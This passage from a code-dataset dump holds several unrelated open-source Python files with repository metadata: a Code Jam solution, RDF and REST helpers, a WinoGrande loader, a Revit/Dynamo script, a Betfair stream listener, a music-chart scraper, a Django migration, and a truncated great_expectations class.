| [
"niketanmoon@gmail.com"
] | niketanmoon@gmail.com |
4a598d2367df91c2132f36ba1260a08e69c2849f | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_156/405.py | aeb8d5ee9d8ab943436dd2561792b7b36aab3233 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | for j in range(int(raw_input())):
I = int(raw_input())
A = list(map(int, raw_input().split(" ")))
result = max(A)
Z = 2
while Z < result:
result = min(result, sum([(x - 1) // Z for x in A]) + Z)
Z += 1
print 'Case #%d: %s' % (j + 1, result) | [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
2066d3c55c24d18937568e13c5eed223311a3637 | 7876cdf2db81f57998578823f677536e85691075 | /jsongraph/binding.py | e269afb396a71490c93d62c230d23fdd84b24a4d | [
"MIT"
] | permissive | backgroundcheck/jsongraph | fe43b2d1bd3c762639614e513cd727bc93a89a0c | 35e4f397dbe69cd5553cf9cb9ab98859c3620f03 | refs/heads/master | 2021-01-17T11:43:40.447531 | 2015-10-02T13:20:53 | 2015-10-02T13:20:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,040 | py | from rdflib import Literal, URIRef
# from rdflib.term import Identifier
# from rdflib.namespace import RDF
from jsonmapping import SchemaVisitor
from jsongraph.util import is_url, safe_uriref
from jsongraph.vocab import BNode, PRED, ID
class Binding(SchemaVisitor):
    """Schema visitor that maps JSON-schema nodes onto RDF terms."""
    @property
    def uri(self):
        """URIRef for this node's schema path, or None when absent."""
        val = self.path
        return None if val is None else URIRef(val)
    @property
    def subject(self):
        """RDF subject for this node, computed once and cached.

        Uses the property named by the schema's ``rdfSubject`` hint
        (default ``id``); falls back to a fresh blank node.
        """
        if not hasattr(self, '_rdf_subject'):
            self._rdf_subject = None
            subject = self.schema.get('rdfSubject', 'id')
            for prop in self.properties:
                if prop.match(subject):
                    obj = prop.object
                    # Coerce plain identifiers into the ID namespace.
                    if obj is not None and not isinstance(obj, URIRef):
                        obj = ID[obj]
                    self._rdf_subject = obj
                    break
            if self._rdf_subject is None:
                self._rdf_subject = BNode()
        return self._rdf_subject
    @property
    def predicate(self):
        """Predicate term, from the ``rdfName`` hint or the node name."""
        return PRED[self.schema.get('rdfName', self.name)]
    @property
    def reverse(self):
        """Reverse predicate, inherited through enclosing arrays.

        Implicitly returns None when neither this node nor an enclosing
        array declares ``rdfReverse``.
        """
        name = self.schema.get('rdfReverse')
        if name is not None:
            return PRED[name]
        if self.parent is not None and self.parent.is_array:
            return self.parent.reverse
    @property
    def object(self):
        """RDF object for this node's data value.

        URI-typed values become URIRefs, id-typed values become ID terms
        (or URIRefs when they look like URLs); everything else becomes a
        Literal. NOTE(review): the bare ``except:`` clauses silently fall
        back when safe_uriref rejects the value.
        """
        if self.data is None:
            return self.data
        if self.schema.get('format') == 'uri' or \
                self.schema.get('rdfType') == 'uri':
            try:
                return safe_uriref(self.data)
            except:
                pass
        if self.schema.get('rdfType') == 'id':
            if is_url(self.data):
                try:
                    return safe_uriref(self.data)
                except:
                    pass
            return ID[self.data]
        return Literal(self.data)
| [
"friedrich@pudo.org"
] | friedrich@pudo.org |
5bb04a05fca219f33e78261c8eabe59102d646b5 | fb82fdf706863465b1f357cd1fa0447474cd8a70 | /ServerComponent/venv/Lib/site-packages/rsrc/framework/view.py | 33c4500d6b89d88f27d05dc9d26bfb47d98bb8b9 | [
"MIT"
] | permissive | CDU55/FakeNews | d79e2a069b3f1392f779d5b2256cd54c696e789a | 707bd48dd78851081d98ad21bbdadfc2720bd644 | refs/heads/main | 2023-02-20T06:27:18.618837 | 2021-01-17T15:14:27 | 2021-01-17T15:14:27 | 305,167,221 | 0 | 1 | MIT | 2020-12-07T19:51:46 | 2020-10-18T18:16:49 | Python | UTF-8 | Python | false | false | 2,331 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import json
import functools
from rsrc import Request
def response(method):
    """Decorator that turns a view method's Response into framework output.

    The wrapped method must return an object exposing ``data``, ``status``
    and ``headers``; its data is serialized to JSON, the Content-Type
    header is forced to application/json, and the result is handed to the
    instance's ``make_response`` hook.
    """
    @functools.wraps(method)
    def wrapper(self, *args, **kwargs):
        resp = method(self, *args, **kwargs)
        body = json.dumps(resp.data)
        resp.headers.update({'Content-Type': 'application/json'})
        return self.make_response(body, resp.status, resp.headers)
    return wrapper
class ProxyView(object):
    """Delegate requests from framework-view to resource-view.
    Subclasses of `ProxyView` should set the `view` attribute, and override
    the following methods:
        get_uri
        get_query_params
        get_auth_params
        get_data
        make_response
    """

    def get_uri(self, request):
        """Extract the request URI from the framework request object."""
        raise NotImplementedError()

    def get_query_params(self, request):
        """Extract the query parameters from the framework request."""
        raise NotImplementedError()

    def get_auth_params(self, request):
        """Extract authentication parameters from the framework request."""
        raise NotImplementedError()

    def get_data(self, request):
        """Extract the request body/data from the framework request."""
        raise NotImplementedError()

    def make_response(self, data, status, headers):
        """Build the framework-specific response object."""
        raise NotImplementedError()

    def make_request(self, raw_request):
        """Translate a framework request into an rsrc Request."""
        request = Request(
            scheme=raw_request.scheme,
            uri=self.get_uri(raw_request),
            method=raw_request.method,
            data=self.get_data(raw_request),
            query_params=self.get_query_params(raw_request),
            kwargs=dict(auth=self.get_auth_params(raw_request))
        )
        return request

    @response
    def options(self, request, **kwargs):
        return self.view.options_proxy(self.make_request(request), **kwargs)

    @response
    def get(self, request, **kwargs):
        return self.view.get_proxy(self.make_request(request), **kwargs)

    @response
    def post(self, request, **kwargs):
        # Bug fix: **kwargs were previously passed to make_request()
        # instead of post_proxy(), which raised TypeError whenever URL
        # kwargs were present and never forwarded them to the view.
        # Now consistent with the other HTTP verbs.
        return self.view.post_proxy(self.make_request(request), **kwargs)

    @response
    def put(self, request, **kwargs):
        return self.view.put_proxy(self.make_request(request), **kwargs)

    @response
    def patch(self, request, **kwargs):
        return self.view.patch_proxy(self.make_request(request), **kwargs)

    @response
    def delete(self, request, **kwargs):
        return self.view.delete_proxy(self.make_request(request), **kwargs)
"48147775+BiancaChirica@users.noreply.github.com"
] | 48147775+BiancaChirica@users.noreply.github.com |
196640e93c3fb69f365d16802339e2aa1414300b | 739e41d4f24f79c772d266cded0de9b759c6e953 | /venv/lib/python3.6/site-packages/nlp/datasets/winogrande/61dcf44f5c98e1c1c1526feabb5b487d0362949de206a1208b95d9042b89378c/winogrande.py | 6e0be715a32acff4004245b67b56d63b2cb8574b | [
"MIT"
] | permissive | MachineLearningBCAM/Minimax-risk-classifiers-NeurIPS-2020 | 24b7bbdecf459292f8b58be286feab3b9aa341ba | 82586c632268c103de269bcbffa5f7849b174a29 | refs/heads/main | 2023-05-18T15:41:13.495286 | 2021-06-11T18:21:35 | 2021-06-11T18:21:35 | 304,268,819 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,433 | py | """TODO(winogrande): Add a description here."""
from __future__ import absolute_import, division, print_function
import csv
import json
import os
import nlp
# TODO(winogrande): BibTeX citation
_CITATION = """\
@InProceedings{ai2:winogrande,
title = {WinoGrande: An Adversarial Winograd Schema Challenge at Scale},
authors={Keisuke, Sakaguchi and Ronan, Le Bras and Chandra, Bhagavatula and Yejin, Choi
},
year={2019}
}
"""
# TODO(winogrande):
_DESCRIPTION = """\
WinoGrande is a new collection of 44k problems, inspired by Winograd Schema Challenge (Levesque, Davis, and Morgenstern
2011), but adjusted to improve the scale and robustness against the dataset-specific bias. Formulated as a
fill-in-a-blank task with binary options, the goal is to choose the right option for a given sentence which requires
commonsense reasoning.
"""
_URL = 'https://storage.googleapis.com/ai2-mosaic/public/winogrande/winogrande_1.1.zip'
_SIZES = ['xs', 's', 'm', 'l', 'xl']
class WinograndeConfig(nlp.BuilderConfig):
    """BuilderConfig for WinoGrande (one config per training-set size)."""

    def __init__(self,
                 data_size,
                 **kwargs
                 ):
        """
        Args:
          data_size: size of the training set to use (one of: xs, s, m, l, xl)
          **kwargs: keyword arguments forwarded to super.
        """
        # NOTE(review): the config version is pinned to "1.0.0" while the
        # builder's VERSION below is 1.1.0 — confirm this mismatch is intended.
        super(WinograndeConfig, self).__init__(
            version=nlp.Version(
                "1.0.0",
                "New split API (https://tensorflow.org/datasets/splits)"),
            **kwargs)
        # Selected training-set size; used to pick the train_{size}.jsonl file.
        self.data_size = data_size
class Winogrande(nlp.GeneratorBasedBuilder):
    """WinoGrande dataset builder: one train/dev/test split per configured
    training-set size (see BUILDER_CONFIGS below)."""

    VERSION = nlp.Version('1.1.0')
    # One config per training-set size defined in the module-level _SIZES list.
    BUILDER_CONFIGS = [
        WinograndeConfig(
            name='winogrande_'+size,
            description='AI2 dataset',
            data_size=size
        ) for size in _SIZES
    ]

    def _info(self):
        """Return the nlp.DatasetInfo describing features and metadata."""
        return nlp.DatasetInfo(
            # This is the description that will appear on the datasets page.
            description=_DESCRIPTION,
            # All four fields are plain strings; 'answer' is empty for test rows
            # (see _generate_examples).
            features=nlp.Features({
                'sentence': nlp.Value('string'),
                'option1': nlp.Value('string'),
                'option2': nlp.Value('string'),
                'answer': nlp.Value('string')
            }),
            # If there's a common (input, target) tuple from the features,
            # specify them here. They'll be used if as_supervised=True in
            # builder.as_dataset.
            supervised_keys=None,
            # Homepage of the dataset for documentation
            homepage='https://leaderboard.allenai.org/winogrande/submissions/get-started',
            citation=_CITATION,
        )

    def _split_generators(self, dl_manager):
        """Download the archive and return train/test/dev SplitGenerators."""
        # dl_manager is a nlp.download.DownloadManager that can be used to
        # download and extract URLs
        dl_dir = dl_manager.download_and_extract(_URL)
        data_dir = os.path.join(dl_dir, 'winogrande_1.1')
        return [
            nlp.SplitGenerator(
                name=nlp.Split.TRAIN,
                # These kwargs will be passed to _generate_examples.
                # The train file depends on the selected data_size config.
                gen_kwargs={
                    'filepath': os.path.join(data_dir, 'train_{}.jsonl'.format(self.config.data_size)),
                    #'labelpath': os.path.join(data_dir, 'train_{}-labels.lst'.format(self.config.data_size)),
                    'split':'train'
                },
            ),
            nlp.SplitGenerator(
                name=nlp.Split.TEST,
                # Test rows carry no gold labels.
                gen_kwargs={
                    'filepath': os.path.join(data_dir, 'test.jsonl'),
                    'split': 'test'
                },
            ),
            nlp.SplitGenerator(
                name=nlp.Split.VALIDATION,
                gen_kwargs={
                    'filepath': os.path.join(data_dir, 'dev.jsonl'),
                    #'labelpath': os.path.join(data_dir, 'dev-labels.lst'),
                    'split': 'dev'
                },
            ),
        ]

    def _generate_examples(self, filepath, split):
        """Yield (id, example) tuples from one JSONL split file.

        For the test split the 'answer' field is emitted as an empty string
        because the released test file has no gold labels.
        """
        with open(filepath) as f:
            for id_, row in enumerate(f):
                data = json.loads(row)
                if split=='test':
                    yield id_, {
                        'sentence': data['sentence'],
                        'option1': data['option1'],
                        'option2': data['option2'],
                        'answer': ''
                    }
                else:
                    yield id_,{
                        'sentence': data['sentence'],
                        'option1': data['option1'],
                        'option2': data['option2'],
                        'answer': data['answer']
                    }
# def _generate_test_example(filepath, split, labelpath=None):
# with open(filepath) as f:
# for id_, row in enumerate(f):
# data = json.loads(row)
# yield id_,{
# 'sentence': data['sentence'],
# 'option1': data['option1'],
# 'option2': data['option2'],
# 'answer': None
# }
| [
"adiaz@bcamath.org"
] | adiaz@bcamath.org |
24981d1ca550c828a9733f5955126a18a2d925b3 | 0aa98e0e7d9b63179eaaecd406e0b726594bed1e | /betfairlightweight/streaming/listener.py | c698f37f883a7971c3b36d6f140d8676a5e595c0 | [
"MIT"
] | permissive | alexeypavlenko/betfairlightweight | ce16c60cc8872961ca25452836098c90780ad84a | 3841ca88466abf08152b7a4d2b8fced196307105 | refs/heads/master | 2021-01-11T12:26:51.787855 | 2016-12-11T09:06:29 | 2016-12-11T09:06:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,568 | py | import json
import logging
import time
from .stream import MarketStream, OrderStream
class BaseListener:
    """Minimal listener that tracks one market stream and one order stream."""

    # Maps a subscription operation name to the attribute that stores it.
    _STREAM_SLOTS = {
        'marketSubscription': 'market_stream',
        'orderSubscription': 'order_stream',
    }

    def __init__(self):
        self.market_stream = None
        self.order_stream = None

    def register_stream(self, unique_id, operation):
        """Record the stream created for *operation* under *unique_id*.

        Re-registering an operation replaces the previous stream and logs a
        warning; unknown operations are ignored.
        """
        if operation == 'authentication':
            logging.info('[Listener: %s]: %s' % (unique_id, operation))
            return
        slot = self._STREAM_SLOTS.get(operation)
        if slot is None:
            return
        if getattr(self, slot) is not None:
            logging.warning('[Listener: %s]: %s stream already registered, replacing data' %
                            (unique_id, operation))
        setattr(self, slot, self._add_stream(unique_id, operation))

    def on_data(self, raw_data):
        """Default raw-data handler: just echo the payload."""
        print(raw_data)

    def _add_stream(self, unique_id, operation):
        """Stream-creation hook; the base class only announces the registration."""
        print('Register: %s %s' % (operation, unique_id))

    def __str__(self):
        return '<BaseListener>'

    def __repr__(self):
        return str(self)
class StreamListener(BaseListener):
    """Stream listener, processes results from socket,
    holds a market and order stream which hold
    market_book caches
    """

    def __init__(self, output_queue=None):
        super(StreamListener, self).__init__()
        # Optional queue that downstream streams push processed output onto.
        self.output_queue = output_queue

    def on_data(self, raw_data):
        """Called when raw data is received from connection.
        Override this method if you wish to manually handle
        the stream data

        :param raw_data: Received raw data
        :return: Return False to stop stream and close connection
        """
        try:
            data = json.loads(raw_data)
        except ValueError:
            logging.error('value error: %s' % raw_data)
            return
        unique_id = data.get('id')
        # A FAILURE status with a closed connection stops the stream.
        if self._error_handler(data, unique_id):
            return False
        operation = data.get('op')
        if operation == 'connection':
            self._on_connection(data, unique_id)
        elif operation == 'status':
            self._on_status(data, unique_id)
        elif operation == 'mcm' or operation == 'ocm':
            self._on_change_message(data, unique_id)
        # Unknown operations fall through (implicit None keeps the stream open).

    def _on_connection(self, data, unique_id):
        """Called on collection operation

        :param data: Received data
        """
        # NOTE(review): connection_id is only defined after the first
        # 'connection' message; it is not initialised in __init__.
        self.connection_id = data.get('connectionId')
        logging.info('[Connect: %s]: connection_id: %s' % (unique_id, self.connection_id))

    @staticmethod
    def _on_status(data, unique_id):
        """Called on status operation

        :param data: Received data
        """
        status_code = data.get('statusCode')
        logging.info('[Subscription: %s]: %s' % (unique_id, status_code))

    def _on_change_message(self, data, unique_id):
        """Dispatch a market ('mcm') or order ('ocm') change message to the
        matching stream, keyed on the message's change type."""
        change_type = data.get('ct', 'UPDATE')
        operation = data.get('op')
        if operation == 'mcm':
            stream = self.market_stream
        else:
            stream = self.order_stream
        logging.debug('[Subscription: %s]: %s: %s' % (unique_id, change_type, data))
        if change_type == 'SUB_IMAGE':
            stream.on_subscribe(data)
        elif change_type == 'RESUB_DELTA':
            stream.on_resubscribe(data)
        elif change_type == 'HEARTBEAT':
            stream.on_heartbeat(data)
        elif change_type == 'UPDATE':
            stream.on_update(data)

    def _add_stream(self, unique_id, stream_type):
        """Create the concrete stream object for a subscription type."""
        if stream_type == 'marketSubscription':
            return MarketStream(unique_id, self.output_queue)
        elif stream_type == 'orderSubscription':
            return OrderStream(unique_id, self.output_queue)

    @staticmethod
    def _error_handler(data, unique_id):
        """Called when data first received

        :param data: Received data
        :param unique_id: Unique id
        :return: True if error present
        """
        status_code = data.get('statusCode')
        connection_closed = data.get('connectionClosed')
        if status_code == 'FAILURE':
            logging.error('[Subscription: %s] %s: %s' %
                          (unique_id, data.get('errorCode'), data.get('errorMessage')))
            if connection_closed:
                return True

    def __str__(self):
        return '<StreamListener>'
| [
"paulingliam@gmail.com"
] | paulingliam@gmail.com |
d361163583c2c32c54d91c8e8707524d150b297a | a110cda0dd755a0aeeccaa349de5b7c8f836f7d9 | /Dynamo_0.7.X/markerAndTextDisplayStyle.py | 390152422c99ba55f8f8ecbba14bd663d5c5819d | [] | no_license | ksobon/archi-lab | 26d93ef07e4f571e73a78bc40299edd3dc84c2a6 | 9a8a57eccca899ace78a998dc7698ff7754fae6b | refs/heads/master | 2021-01-15T09:37:06.045588 | 2020-06-03T15:55:46 | 2020-06-03T15:55:46 | 26,090,112 | 6 | 5 | null | 2020-02-09T04:24:41 | 2014-11-02T19:02:28 | Python | UTF-8 | Python | false | false | 4,562 | py | #Copyright(c) 2015, Konrad K Sobon
# @arch_laboratory, http://archi-lab.net
import clr
clr.AddReference('ProtoGeometry')
from Autodesk.DesignScript.Geometry import *
# Import DocumentManager and TransactionManager
clr.AddReference("RevitServices")
import RevitServices
from RevitServices.Persistence import DocumentManager
from RevitServices.Transactions import TransactionManager
from System.Collections.Generic import *
# Import RevitAPI
clr.AddReference("RevitAPI")
import Autodesk
from Autodesk.Revit.DB import *
from Autodesk.Revit.DB.Analysis import *
doc = DocumentManager.Instance.CurrentDBDocument
uiapp = DocumentManager.Instance.CurrentUIApplication
app = uiapp.Application
# Import ToDSType(bool) extension method
clr.AddReference("RevitNodes")
import Revit
clr.ImportExtensions(Revit.Elements)
#The inputs to this node will be stored as a list in the IN variable.
dataEnteringNode = IN
points = IN[0]
values = IN[1]
colorSettings = IN[2]
legendSettings = IN[3]
markerSettings = IN[4]
displayStyleName = IN[5]
analysisResultName = IN[6]
analysisResultDescription = IN[7]
unitNames = IN[8]
unitMultipliers = IN[9]
displayUnit = IN[10]
message = ""
def dsPointToRvtPoint(dsPoint):
    """Convert a Dynamo/DesignScript point (meters) to a Revit XYZ (decimal feet).

    Revit's internal length unit is the decimal foot, so every coordinate is
    scaled by the meters-to-feet factor before constructing the XYZ.

    :param dsPoint: DesignScript point with X/Y/Z attributes, in meters.
    :return: Autodesk.Revit.DB.XYZ in Revit internal units (feet).
    """
    METERS_TO_FEET = 3.2808398950  # named instead of a bare magic number
    return Autodesk.Revit.DB.XYZ(
        dsPoint.X * METERS_TO_FEET,
        dsPoint.Y * METERS_TO_FEET,
        dsPoint.Z * METERS_TO_FEET,
    )
def chunks(data, n):
    """Split *data* into consecutive slices of at most *n* items each.

    A non-positive chunk size is clamped to 1 so the slicing step is valid.
    """
    size = max(1, n)
    return [data[start:start + size] for start in range(0, len(data), size)]
#"Start" the transaction
TransactionManager.Instance.EnsureInTransaction(doc)
#create spatial field manager if one doesnt already exist
sfm = SpatialFieldManager.GetSpatialFieldManager(doc.ActiveView)
if sfm == None:
sfm = SpatialFieldManager.CreateSpatialFieldManager(doc.ActiveView, 1)
sfm.Clear()
#get result schema index if existing else crete one
regResults = sfm.GetRegisteredResults()
if len(regResults) != 0:
for i in regResults:
if sfm.GetResultSchema(i).Name == analysisResultName:
resultSchema = sfm.GetResultSchema(i)
else:
resultSchema = AnalysisResultSchema(analysisResultName, analysisResultDescription)
names = List[str]()
multipliers = List[float]()
for i,j in zip(unitMultipliers, unitNames):
multipliers.Add(i)
names.Add(j)
resultSchema.SetUnits(names, multipliers)
for i in range(0, resultSchema.GetNumberOfUnits(), 1):
if resultSchema.GetUnitsName(i) == displayUnit:
resultSchema.CurrentUnits = i
message = "Success! Remember that your current \ndisplay units are set to " + displayUnit
else:
continue
if resultSchema.GetUnitsName(resultSchema.CurrentUnits) != displayUnit:
message = "Display Units supplied not available. \nEither add those units to results or \nspecify one of the already supplied."
schemaIndex = sfm.RegisterResult(resultSchema)
#create spatial field primitives and assign values to points
points = chunks(points, 999)
values = chunks(values, 999)
for i, j in zip(points, values):
fieldPoints = List[Autodesk.Revit.DB.XYZ]()
for point in i:
fieldPoints.Add(dsPointToRvtPoint(point))
pnts = FieldDomainPointsByXYZ(fieldPoints)
fieldPoints.Clear()
valList = List[ValueAtPoint]()
doubleList = List[float]()
for value in j:
doubleList.Add(float(value))
valList.Add(ValueAtPoint(doubleList))
doubleList.Clear()
vals = FieldValues(valList)
valList.Clear()
idx = sfm.AddSpatialFieldPrimitive()
sfm.UpdateSpatialFieldPrimitive(idx, pnts, vals, schemaIndex)
#define analysis display style and set legend/color settings
collector = FilteredElementCollector(doc)
collection = collector.OfClass(AnalysisDisplayStyle).ToElements()
displayStyle = []
for i in collection:
if i.Name == displayStyleName and i.HasMarkersAndTextSettings():
displayStyle.append(i)
elif i.Name == displayStyleName and not i.HasMarkersAndTextSettings():
message = "Specified Display Style name already \nexists; please supply different name"
else:
continue
if len(displayStyle) == 0:
try:
analysisDisplayStyle = AnalysisDisplayStyle.CreateAnalysisDisplayStyle(doc, displayStyleName, markerSettings, colorSettings, legendSettings)
except:
pass
else:
analysisDisplayStyle = displayStyle[0]
analysisDisplayStyle.SetLegendSettings(legendSettings)
analysisDisplayStyle.SetColorSettings(colorSettings)
analysisDisplayStyle.SetMarkersAndTextSettings(markerSettings)
try:
doc.ActiveView.AnalysisDisplayStyleId = analysisDisplayStyle.Id
except:
pass
# "End" the transaction
TransactionManager.Instance.TransactionTaskDone()
#Assign your output to the OUT variable
if len(message) != 0:
OUT = '\n'.join('{:^35}'.format(s) for s in message.split('\n'))
else:
OUT = 0
| [
"ksobon1986@gmail.com"
] | ksobon1986@gmail.com |
941fad21374a597dfb5c097d482af2e93d687dab | 2951174fd6d8a7cf9a71e0663ae3b22bd309be5a | /yinyuetai.py | ef78c8285d10e9124070a491e1d831f446d99c16 | [] | no_license | WhiteBrownBottle/Python- | c76045a3127723666083cee4b4c20b08491e4067 | 92fcaba555a566eae829ea401a20f459b4f39dfe | refs/heads/master | 2021-07-18T21:17:45.677091 | 2017-10-24T06:47:38 | 2017-10-24T06:47:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,953 | py | import os
import requests
import bs4
import random
def get_html(url):
    """Fetch *url* and return the decoded body text.

    Returns the page text on success, or the string 'Something wrong!' on any
    request failure (contract kept for backward compatibility with callers).
    """
    try:
        r = requests.get(url, timeout=30)
        # BUG FIX: raise_for_status was referenced without calling it (a
        # no-op), so HTTP 4xx/5xx responses were silently treated as success.
        r.raise_for_status()
        r.encoding = r.apparent_encoding
        return r.text
    except requests.RequestException:
        return 'Something wrong!'
def get_agent():
    """Return a fake request-header dict with a randomly chosen User-agent.

    :return: dict with a single 'User-agent' key
    """
    agents = ['Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;',
              'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1',
              'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',
              'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
              'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)']
    # BUG FIX: random.randint(0, len(agents)) is inclusive on BOTH ends, so it
    # could index one past the end and raise IndexError (~1 in 6 calls).
    fakeheader = {}
    fakeheader['User-agent'] = random.choice(agents)
    return fakeheader
def get_proxy():
    """Return a fake proxy mapping picked at random from a small pool.

    :return: dict with a single 'http' key
    """
    proxy = ["http://203.91.121.76:3128",
             "http://123.7.38.31:9999",
             "http://218.56.132.155:8080",
             "http://220.249.185.178:9999",
             "http://218.66.253.145:8800",
             "http://110.73.15.81:80",
             "http://61.163.39.70:9999",
             "http://27.44.174.134:9999"]
    # BUG FIX: random.randint(0, len(proxy)) is inclusive on BOTH ends and
    # could raise IndexError; random.choice never goes out of range.
    fakepxs = {}
    fakepxs['http'] = random.choice(proxy)
    return fakepxs
def get_content(url):
    """Fetch one chart page and print its header plus one dict per entry.

    The last two characters of *url* select which regional chart header to
    print; each chart entry is parsed from the page and printed as a dict.
    """
    # Print the chart header based on the URL's region suffix.
    if url[-2:] == 'ML':
        print('内地排行榜')
    elif url[-2:] == 'HT':
        print('港台排行榜')
    elif url[-2:] == 'US':
        print('欧美排行榜')
    elif url[-2:] == 'KR':
        print('韩国排行榜')
    else:
        print('日本排行榜')
    # Locate every chart-entry tag on the page.
    html = get_html(url)
    soup = bs4.BeautifulSoup(html, 'lxml')
    li_list = soup.find_all('li', attrs={'name' : 'dmvLi'})
    for li in li_list:
        match = {}
        try:
            # Score direction differs per entry (rising vs falling).
            if li.find('h3', class_='desc_score'):
                match['分数'] = li.find('h3', class_='desc_score').text
            else:
                match['分数'] = li.find('h3', class_='asc_score').text
            match['排名'] = li.find('div', class_='top_num').text
            match['名字'] = li.find('a', class_='mvname').text
            match['发布时间'] = li.find('p', class_='c9').text
            match['歌手'] = li.find('a', class_='special').text
        except AttributeError:
            # BUG FIX: this used to `return ""`, so one malformed entry
            # aborted the whole listing (and returned a str instead of the
            # usual None). Skip just the bad entry instead.
            continue
        print(match)
def main():
    """Print every regional chart, one after another."""
    base_url = "http://vchart.yinyuetai.com/vchart/trends?area="
    for region in ('ML', 'HT', 'US', 'JP', 'KR'):
        print()
        get_content(base_url + region)


if __name__ == '__main__':
    main()
"958255724@qq.com"
] | 958255724@qq.com |
c9ad0beaf717d4624106ae4450733c77f377bf54 | f97242dfbe3c629dcabb6226b59aaf808a5b1cec | /project/analysis/migrations/0002_auto_20151216_1041.py | ba6d0fa627953bddd0602f1598b1068dc1b19f8c | [] | no_license | shapiromatron/genomics | ab48cc2d7eab94e9777ffce0ee7d5865af7d7ae1 | 8cabcaf7a6a04cd84fdefca6a39c9fde5f3329c8 | refs/heads/master | 2021-01-21T04:50:24.186897 | 2016-06-10T19:52:24 | 2016-06-10T19:52:24 | 44,177,551 | 0 | 1 | null | 2016-06-10T19:44:42 | 2015-10-13T13:19:32 | Python | UTF-8 | Python | false | false | 2,020 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
# Auto-generated Django migration (makemigrations output); avoid hand-editing
# applied migrations -- create a new migration for further schema changes.
class Migration(migrations.Migration):

    dependencies = [
        ('analysis', '0001_initial'),
    ]

    operations = [
        # Admin-facing plural names for several models.
        migrations.AlterModelOptions(
            name='analysis',
            options={'verbose_name_plural': 'Analyses'},
        ),
        migrations.AlterModelOptions(
            name='analysisdatasets',
            options={'verbose_name_plural': 'Analysis datasets'},
        ),
        migrations.AlterModelOptions(
            name='datasetcorrelationmatrix',
            options={'verbose_name_plural': 'Dataset correlation matrices'},
        ),
        migrations.AlterModelOptions(
            name='featurelistcountmatrix',
            options={'verbose_name_plural': 'Feature list count matrices'},
        ),
        # Widen file fields to 256 chars (several optional on genomicdataset).
        migrations.AlterField(
            model_name='datasetcorrelationmatrix',
            name='matrix',
            field=models.FileField(max_length=256, upload_to=''),
        ),
        migrations.AlterField(
            model_name='featurelistcountmatrix',
            name='matrix',
            field=models.FileField(max_length=256, upload_to=''),
        ),
        migrations.AlterField(
            model_name='genomicdataset',
            name='data_ambiguous',
            field=models.FileField(max_length=256, blank=True, upload_to=''),
        ),
        migrations.AlterField(
            model_name='genomicdataset',
            name='data_minus',
            field=models.FileField(max_length=256, blank=True, upload_to=''),
        ),
        migrations.AlterField(
            model_name='genomicdataset',
            name='data_plus',
            field=models.FileField(max_length=256, blank=True, upload_to=''),
        ),
        migrations.AlterField(
            model_name='genomicdataset',
            name='genome_assembly',
            field=models.PositiveSmallIntegerField(choices=[(1, 'hg19'), (2, 'mm9')]),
        ),
    ]
| [
"shapiromatron@gmail.com"
] | shapiromatron@gmail.com |
21b9439764ab2bc2b66440c6d24e63f1b755f5c2 | 4d586ecc9febedb199376bc005eb783c55fae7b0 | /great_expectations/expectations/core/expect_column_values_to_match_like_pattern.py | c6a927e14227c06c8ace633c79c429646d7294f7 | [
"Apache-2.0"
] | permissive | spbail/great_expectations | 1db532763ad9c5c07aec251b64a61de3fb6f677f | c4fa245f77912dfdfd613c84fb75f631c0b73f03 | refs/heads/main | 2023-07-01T23:40:44.586052 | 2021-04-22T00:09:35 | 2021-04-22T00:09:35 | 360,619,476 | 2 | 0 | Apache-2.0 | 2021-04-22T17:20:19 | 2021-04-22T17:20:18 | null | UTF-8 | Python | false | false | 2,792 | py | from typing import Optional
from great_expectations.core.expectation_configuration import ExpectationConfiguration
from great_expectations.expectations.util import render_evaluation_parameter_string
from ...render.renderer.renderer import renderer
from ...render.util import substitute_none_for_missing
from ..expectation import ColumnMapExpectation, InvalidExpectationConfigurationError
try:
import sqlalchemy as sa
except ImportError:
pass
class ExpectColumnValuesToMatchLikePattern(ColumnMapExpectation):
library_metadata = {
"maturity": "production",
"package": "great_expectations",
"tags": ["core expectation", "column map expectation"],
"contributors": [
"@great_expectations",
],
"requirements": [],
}
map_metric = "column_values.match_like_pattern"
success_keys = (
"mostly",
"like_pattern",
)
default_kwarg_values = {
"like_pattern": None,
"row_condition": None,
"condition_parser": None, # we expect this to be explicitly set whenever a row_condition is passed
"mostly": 1,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": True,
}
def validate_configuration(self, configuration: Optional[ExpectationConfiguration]):
super().validate_configuration(configuration)
try:
assert "like_pattern" in configuration.kwargs, "Must provide like_pattern"
assert isinstance(
configuration.kwargs.get("like_pattern"), (str, dict)
), "like_pattern must be a string"
if isinstance(configuration.kwargs.get("like_pattern"), dict):
assert "$PARAMETER" in configuration.kwargs.get(
"like_pattern"
), 'Evaluation Parameter dict for like_pattern kwarg must have "$PARAMETER" key.'
except AssertionError as e:
raise InvalidExpectationConfigurationError(str(e))
return True
@classmethod
@renderer(renderer_type="renderer.prescriptive")
@render_evaluation_parameter_string
def _prescriptive_renderer(
cls,
configuration=None,
result=None,
language=None,
runtime_configuration=None,
**kwargs
):
runtime_configuration = runtime_configuration or {}
include_column_name = runtime_configuration.get("include_column_name", True)
include_column_name = (
include_column_name if include_column_name is not None else True
)
styling = runtime_configuration.get("styling")
params = substitute_none_for_missing(
